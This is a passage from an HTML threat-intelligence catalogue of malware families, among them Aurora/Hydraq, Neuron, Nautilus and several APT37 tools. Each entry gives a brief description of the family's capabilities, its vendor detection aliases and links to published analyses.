<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html">http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exforel"><a class="anchor" href="#_exforel"></a><a class="link" href="#_exforel">Exforel</a></h3>
<div class="paragraph">
<p>Exforel backdoor malware, VirTool:WinNT/Exforel.A, backdoor implemented at the Network Driver Interface Specification (NDIS) level.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2802. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://news.softpedia.com/news/Exforel-Backdoor-Implemented-at-NDIS-Level-to-Be-More-Stealthy-Experts-Say-313567.shtml">http://news.softpedia.com/news/Exforel-Backdoor-Implemented-at-NDIS-Level-to-Be-More-Stealthy-Experts-Say-313567.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rotinom"><a class="anchor" href="#_rotinom"></a><a class="link" href="#_rotinom">Rotinom</a></h3>
<div class="paragraph">
<p>W32.Rotinom is a worm that spreads by copying itself to removable drives.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2803. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-011117-0057-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-011117-0057-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aurora"><a class="anchor" href="#_aurora"></a><a class="link" href="#_aurora">Aurora</a></h3>
<div class="paragraph">
<p>You probably have heard the recent news about a widespread attack that was carried out using a 0-Day exploit for Internet Explorer as one of the vectors. This exploit is also known as the "Aurora Exploit". The code has recently gone public and it was also added to the Metasploit framework.
This exploit was used to deliver a malicious payload, known by the name of Trojan.Hydraq, the main purpose of which was to steal information from the compromised computer and report it back to the attackers.
The exploit code makes use of known techniques to exploit a vulnerability that exists in the way Internet Explorer handles a deleted object. The final purpose of the exploit itself is to access an object that was previously deleted, causing the code to reference a memory location over which the attacker has control and in which the attacker dropped his malicious code.</p>
</div>
<div class="paragraph">
<p>Aurora is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Hydraq</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2804. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit">https://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/hydraq-aurora-attackers-back">https://www.symantec.com/connect/blogs/hydraq-aurora-attackers-back</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/hydraq-attack-mythical-proportions">https://www.symantec.com/connect/blogs/hydraq-attack-mythical-proportions</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cheshire_cat"><a class="anchor" href="#_cheshire_cat"></a><a class="link" href="#_cheshire_cat">Cheshire Cat</a></h3>
<div class="paragraph">
<p>Oldest Cheshire Cat malware compiled in 2002. It&#8217;s a very old family of malware.
The time stamps may be forged but the malware does have support for very old operating systems. The 2002 implant retrieves a handle for an asr2892 drives that they never got their hands on. It checks for a NE header which is a header type used before PE headers even existed. References to 16bit or DOS on a non 9x platform. This malware implant IS REALLY for old systems.
The malware is for espionage - it&#8217;s very carefully made to stay hidden. Newer versions install as icon handler shell extension for .lnk files. Shell in this case means the program manager because windows explorer was not yet a thing. It sets up COM server objects. It looks like it was written in pure C, but made to look like C++.
A sensitive implant as well: it checks for all kinds of old MS platforms including Windows NT, win95, win98, winME and more. It checks the patch level as well. A lot of effort was put into adapting this malware to a lot of different operating systems with very granular decision chains.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2805. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=u2Ry9HTBbZI">https://www.youtube.com/watch?v=u2Ry9HTBbZI</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/">https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.peerlyst.com/posts/hack-lu-2016-recap-interesting-malware-no-i-m-not-kidding-by-marion-marschalek-claus-cramon">https://www.peerlyst.com/posts/hack-lu-2016-recap-interesting-malware-no-i-m-not-kidding-by-marion-marschalek-claus-cramon</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_downloader_fgo"><a class="anchor" href="#_downloader_fgo"></a><a class="link" href="#_downloader_fgo">Downloader-FGO</a></h3>
<div class="paragraph">
<p>Downloader-FGO is a trojan that comes hidden in malicious programs. Once you install the source (carrier) program, this trojan attempts to gain "root" access (administrator level access) to your computer without your knowledge</p>
</div>
<div class="paragraph">
<p>Downloader-FGO is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Win32:Malware-gen</p>
</li>
<li>
<p>Generic30.ASYL (Trojan horse)</p>
</li>
<li>
<p>TR/Agent.84480.85</p>
</li>
<li>
<p>Trojan.Generic.8627031</p>
</li>
<li>
<p>Trojan:Win32/Sisproc</p>
</li>
<li>
<p>SB/Malware</p>
</li>
<li>
<p>Trj/CI.A</p>
</li>
<li>
<p>Mal/Behav-112</p>
</li>
<li>
<p>Trojan.Spuler</p>
</li>
<li>
<p>TROJ_KAZY.SM1</p>
</li>
<li>
<p>Win32/FakePPT_i</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2806. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.solvusoft.com/en/malware/trojans/downloader-fgo/">https://www.solvusoft.com/en/malware/trojans/downloader-fgo/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_miniflame"><a class="anchor" href="#_miniflame"></a><a class="link" href="#_miniflame">miniFlame</a></h3>
<div class="paragraph">
<p>Newly discovered spying malware designed to steal data from infected systems was likely built from the same cyber-weaponry factory that produced two other notorious cyberespionage software Flame and Gauss, a security vendor says.
Kaspersky Lab released a technical paper Monday outlining the discovery of the malware the vendor has dubbed "miniFlame."
While capable of working with Flame and Gauss, miniFlame is a "small, fully functional espionage module designed for data theft and direct access to infected systems," Kaspersky said.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2807. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/miniflame-aka-spe-elvis-and-his-friends-5/31730/">https://securelist.com/miniflame-aka-spe-elvis-and-his-friends-5/31730/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.csoonline.com/article/2132422/malware-cybercrime/cyberespionage-malware&#8212;&#8203;miniflame&#8212;&#8203;discovered.html">https://www.csoonline.com/article/2132422/malware-cybercrime/cyberespionage-malware&#8212;&#8203;miniflame&#8212;&#8203;discovered.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ghotex"><a class="anchor" href="#_ghotex"></a><a class="link" href="#_ghotex">GHOTEX</a></h3>
<div class="paragraph">
<p>PE_GHOTEX.A-O is a portable executable (PE is the standard executable format for 32-bit Windows files) virus. PE viruses infect executable Windows files by incorporating their code into these files such that they are executed when the infected files are opened.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2808. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.com/vinfo/dk/threat-encyclopedia/archive/malware/pe_ghotex.a-o">https://www.trendmicro.com/vinfo/dk/threat-encyclopedia/archive/malware/pe_ghotex.a-o</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shipup"><a class="anchor" href="#_shipup"></a><a class="link" href="#_shipup">Shipup</a></h3>
<div class="paragraph">
<p>Trojan:Win32/Shipup.G is a trojan that modifies the Autorun feature for certain devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2809. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Shipup.G">https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Shipup.G</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FShipup.K">https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FShipup.K</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Shipup.A">https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Shipup.A</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32" class="bare">https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32</a><sub>ShipUp-F/detailed-analysis.aspx[<a href="https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32" class="bare">https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32</a></sub>ShipUp-F/detailed-analysis.aspx]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj" class="bare">https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj</a><sub>ShipUp-A/detailed-analysis.aspx[<a href="https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj" class="bare">https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj</a></sub>ShipUp-A/detailed-analysis.aspx]</p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_neuron"><a class="anchor" href="#_neuron"></a><a class="link" href="#_neuron">Neuron</a></h3>
<div class="paragraph">
<p>Neuron consists of both client and server components. The Neuron client and Neuron service are written using the .NET framework with some codebase overlaps.
The Neuron client is used to infect victim endpoints and extract sensitive information from local client machines. The Neuron server is used to infect network infrastructure such as mail and web servers, and acts as local Command &amp; Control (C2) for the client component. Establishing a local C2 limits interaction with the target network and remote hosts. It also reduces the log footprint of actor infrastructure and enables client interaction to appear more convincing as the traffic is contained within the target network.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2810. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20group%20using%20Neuron%20and%20Nautilus%20tools%20alongside%20Snake%20malware_0.pdf">https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20group%20using%20Neuron%20and%20Nautilus%20tools%20alongside%20Snake%20malware_0.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nautilus"><a class="anchor" href="#_nautilus"></a><a class="link" href="#_nautilus">Nautilus</a></h3>
<div class="paragraph">
<p>Nautilus is very similar to Neuron both in the targeting of mail servers and how client communications are performed. This malware is referred to as Nautilus due to its embedded internal DLL name “nautilus-service.dll”, again sharing some resemblance to Neuron.
The Nautilus service listens for HTTP requests from clients to process tasking requests such as executing commands, deleting files and writing files to disk</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2811. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20group%20using%20Neuron%20and%20Nautilus%20tools%20alongside%20Snake%20malware_0.pdf">https://www.ncsc.gov.uk/content/files/protected_files/article_files/Turla%20group%20using%20Neuron%20and%20Nautilus%20tools%20alongside%20Snake%20malware_0.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gamut_botnet"><a class="anchor" href="#_gamut_botnet"></a><a class="link" href="#_gamut_botnet">Gamut Botnet</a></h3>
<div class="paragraph">
<p>Gamut was found to be downloaded by a Trojan Downloader that arrives as an attachment from a spam email message. The bot installation is quite simple. After the malware binary has been downloaded, it launches itself from its current directory, usually the Windows %Temp% folder and installs itself as a Windows service.
The malware utilizes an anti-VM (virtual machine) trick and terminates itself if it detects that it is running in a virtual machine environment. The bot uses INT 03h trap sporadically in its code, an anti-debugging technique which prevents its code from running within a debugger environment. It can also determine if it is being debugged by using the Kernel32 API - IsDebuggerPresent function.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2812. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/necurs-and-gamut-botnets-account-for-97-percent-of-the-internets-spam-emails/">https://www.bleepingcomputer.com/news/security/necurs-and-gamut-botnets-account-for-97-percent-of-the-internets-spam-emails/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Gamut-Spambot-Analysis/">https://www.trustwave.com/Resources/SpiderLabs-Blog/Gamut-Spambot-Analysis/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_coraldeck"><a class="anchor" href="#_coraldeck"></a><a class="link" href="#_coraldeck">CORALDECK</a></h3>
<div class="paragraph">
<p>CORALDECK is an exfiltration tool that searches for specified files and exfiltrates them in password protected archives using hardcoded HTTP POST headers. CORALDECK has been observed dropping and using Winrar to exfiltrate data in password protected RAR files as well as WinImage and zip archives</p>
</div>
<div class="paragraph">
<p>CORALDECK is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT.InfoStealer.Win.CORALDECK</p>
</li>
<li>
<p>FE_APT_InfoStealer_Win_CORALDECK_1</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2813. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dogcall"><a class="anchor" href="#_dogcall"></a><a class="link" href="#_dogcall">DOGCALL</a></h3>
<div class="paragraph">
<p>DOGCALL is a backdoor commonly distributed as an encoded binary file downloaded and decrypted by shellcode following the exploitation of weaponized documents. DOGCALL is capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex. DOGCALL was used to target South Korean Government and military organizations in March and April 2017. The malware is typically dropped using an HWP exploit in a lure document. The wiper tool, RUHAPPY, was found on some of the systems targeted by DOGCALL. While DOGCALL is primarily an espionage tool, RUHAPPY is a destructive wiper tool meant to render systems inoperable.</p>
</div>
<div class="paragraph">
<p>DOGCALL is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_APT_RAT_DOGCALL</p>
</li>
<li>
<p>FE_APT_Backdoor_Win32_DOGCALL_1</p>
</li>
<li>
<p>APT.Backdoor.Win.DOGCALL</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2814. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gelcapsule"><a class="anchor" href="#_gelcapsule"></a><a class="link" href="#_gelcapsule">GELCAPSULE</a></h3>
<div class="paragraph">
<p>GELCAPSULE is a downloader traditionally dropped or downloaded by an exploit document. GELCAPSULE has been observed downloading SLOWDRIFT to victim systems.</p>
</div>
<div class="paragraph">
<p>GELCAPSULE is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_APT_Downloader_Win32_GELCAPSULE_1</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2815. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_happywork"><a class="anchor" href="#_happywork"></a><a class="link" href="#_happywork">HAPPYWORK</a></h3>
<div class="paragraph">
<p>HAPPYWORK is a malicious downloader that can download and execute a second-stage payload, collect system information, and beacon it to the command and control domains. The collected system information includes: computer name, user name, system manufacturer via registry, IsDebuggerPresent state, and execution path. In November 2016, HAPPYWORK targeted government and financial targets in South Korea.</p>
</div>
<div class="paragraph">
<p>HAPPYWORK is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_APT_Downloader_HAPPYWORK</p>
</li>
<li>
<p>FE_APT_Exploit_HWP_Happy</p>
</li>
<li>
<p>Downloader.APT.HAPPYWORK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2816. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_karae"><a class="anchor" href="#_karae"></a><a class="link" href="#_karae">KARAE</a></h3>
<div class="paragraph">
<p>Karae backdoors are typically used as first-stage malware after an initial compromise. The backdoors can collect system information, upload and download files, and may be used to retrieve a second-stage payload. The malware uses public cloud-based storage providers for command and control. In March 2016, KARAE malware was distributed through torrent file-sharing websites for South Korean users. During this campaign, the malware used a YouTube video downloader application as a lure.</p>
</div>
<div class="paragraph">
<p>KARAE is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_APT_Backdoor_Karae_enc</p>
</li>
<li>
<p>FE_APT_Backdoor_Karae</p>
</li>
<li>
<p>Backdoor.APT.Karae</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2817. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_milkdrop"><a class="anchor" href="#_milkdrop"></a><a class="link" href="#_milkdrop">MILKDROP</a></h3>
<div class="paragraph">
<p>MILKDROP is a launcher that sets a persistence registry key and launches a backdoor.</p>
</div>
<div class="paragraph">
<p>MILKDROP is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_Trojan_Win32_MILKDROP_1</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2818. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pooraim"><a class="anchor" href="#_pooraim"></a><a class="link" href="#_pooraim">POORAIM</a></h3>
<div class="paragraph">
<p>POORAIM malware is designed with basic backdoor functionality and leverages AOL Instant Messenger for command and control communications. POORAIM includes the following capabilities: System information enumeration, File browsing, manipulation and exfiltration, Process enumeration, Screen capture, File execution, Exfiltration of browser favorites, and battery status. Exfiltrated data is sent via files over AIM. POORAIM has been involved in campaigns against South Korean media organizations and sites relating to North Korean refugees and defectors since early 2014. Compromised sites have acted as watering holes to deliver newer variants of POORAIM.</p>
</div>
<div class="paragraph">
<p>POORAIM is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Backdoor.APT.POORAIM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2819. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ricecurry"><a class="anchor" href="#_ricecurry"></a><a class="link" href="#_ricecurry">RICECURRY</a></h3>
<div class="paragraph">
<p>RICECURRY is a Javascript based profiler used to fingerprint a victim&#8217;s web browser and deliver malicious code in return. Browser, operating system, and Adobe Flash version are detected by RICECURRY, which may be a modified version of PluginDetect.</p>
</div>
<div class="paragraph">
<p>RICECURRY is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Exploit.APT.RICECURRY</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2820. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ruhappy"><a class="anchor" href="#_ruhappy"></a><a class="link" href="#_ruhappy">RUHAPPY</a></h3>
<div class="paragraph">
<p>RUHAPPY is a destructive wiper tool seen on systems targeted by DOGCALL. It attempts to overwrite the MBR, causing the system not to boot. When victims' systems attempt to boot, the string 'Are you Happy?' is displayed. The malware is believed to be tied to the developers of DOGCALL and HAPPYWORK based on similar PDB paths in all three.</p>
</div>
<div class="paragraph">
<p>RUHAPPY is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_APT_Trojan_Win32_RUHAPPY_1</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2821. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shutterspeed"><a class="anchor" href="#_shutterspeed"></a><a class="link" href="#_shutterspeed">SHUTTERSPEED</a></h3>
<div class="paragraph">
<p>SHUTTERSPEED is a backdoor that can collect system information, acquire screenshots, and download/execute an arbitrary executable. SHUTTERSPEED typically requires an argument at runtime in order to execute fully. Observed arguments used by SHUTTERSPEED include: 'help', 'console', and 'sample'. The spear phishing email messages contained documents exploiting RTF vulnerability CVE-2017-0199. Many of the compromised domains in the command and control infrastructure are linked to South Korean companies. Most of these domains host a fake webpage pertinent to targets.</p>
</div>
<div class="paragraph">
<p>SHUTTERSPEED is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_APT_Backdoor_SHUTTERSPEED</p>
</li>
<li>
<p>APT.Backdoor.SHUTTERSPEED</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2822. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_slowdrift"><a class="anchor" href="#_slowdrift"></a><a class="link" href="#_slowdrift">SLOWDRIFT</a></h3>
<div class="paragraph">
<p>SLOWDRIFT is a launcher that communicates via cloud based infrastructure. It sends system information to the attacker command and control and then downloads and executes additional payloads.Lure documents distributing SLOWDRIFT were not tailored for specific victims, suggesting that TEMP.Reaper is attempting to widen its target base across multiple industries and in the private sector. SLOWDRIFT was seen being deployed against academic and strategic targets in South Korea using lure emails with documents leveraging the HWP exploit. Recent SLOWDRIFT samples were uncovered in June 2017 with lure documents pertaining to cyber crime prevention and news stories. These documents were last updated by the same actor who developed KARAE, POORAIM and ZUMKONG.</p>
</div>
<div class="paragraph">
<p>SLOWDRIFT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_APT_Downloader_Win_SLOWDRIFT_1</p>
</li>
<li>
<p>FE_APT_Downloader_Win_SLOWDRIFT_2</p>
</li>
<li>
<p>APT.Downloader.SLOWDRIFT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2823. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_soundwave"><a class="anchor" href="#_soundwave"></a><a class="link" href="#_soundwave">SOUNDWAVE</a></h3>
<div class="paragraph">
<p>SOUNDWAVE is a windows based audio capturing utility. Via command line it accepts the -l switch (for listen probably), captures microphone input for 100 minutes, writing the data out to a log file in this format: C:\Temp\HncDownload\YYYYMMDDHHMMSS.log.</p>
</div>
<div class="paragraph">
<p>SOUNDWAVE is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FE_APT_HackTool_Win32_SOUNDWAVE_1</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2824. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
